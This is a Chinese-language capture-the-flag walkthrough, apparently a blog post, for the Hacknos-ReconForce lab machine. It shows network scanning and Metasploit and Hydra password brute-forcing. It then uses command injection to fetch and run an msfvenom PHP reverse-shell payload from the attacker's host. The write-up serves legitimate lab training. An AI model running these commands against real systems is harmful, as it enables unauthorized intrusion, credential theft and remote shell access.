Hacknos-ReconForce

一、信息收集

步骤一:主机发现

nmap 192.168.7.0/24

步骤二:端口扫描

nmap 192.168.7.209 -p-

只有21,22,80三个端口开放

步骤三:尝试使用弱口令ftp/ftp连接ftp服务器,成功但没有数据

步骤四:访问ip地址,点击TroubleShoot,发现登录框

步骤五:使用MSF进行登录爆破,需要将“Security@hackNos”添加到字典文件中...爆破成功....

加入msf密码字典:
/usr/share/metasploit-framework/data/wordlists/http_default_pass.txt


use auxiliary/scanner/http/http_login
show options	# 获知密码的字典位置,把“Security@hackNos”加入到密码字典中
set AUTH_URI /5ecure/
set STOP_ON_SUCCESS true
set RHOSTS 192.168.1.93
exploit

步骤六:根据以上爆破出来的用户和密码 admin:Security@hackNos 进行登录

步骤七:看起来像是命令执行漏洞,Burp抓包测试,测试执行系统命令%7Cls并查看out.php文件中发现过滤规则...查看/etc/passwd文件中发现recon用户可以进行登录...

二、反弹shell

步骤八:使用MSF生成一个PHP木马并开启一个http服务提供下载...开启MSF监听模块...并在目标站点上下载并执行PHP代码..

>>>攻击机操作
####生成恶意文件
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.7.153 lport=4444 -f raw > f4.php
####开启Web服务
python3 -m http.server 80
####开启MSF监听
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lport 4444
set lhost 192.168.7.153
exploit
  
python -c 'import pty; pty.spawn("/bin/bash")'
>>>目标靶机操作
wget http%3a//192.168.7.153:80/f4.php		# 下载恶意文件
php f4.php		# 运行恶意文件

步骤九:获取第一个Flag...使用Hydra对SSH服务进行暴力破解...得出用户密码recon:Security@hackNos在Shell中进行用户身份切换或登录..

hydra -l recon -P /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt ssh://192.168.7.209

  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值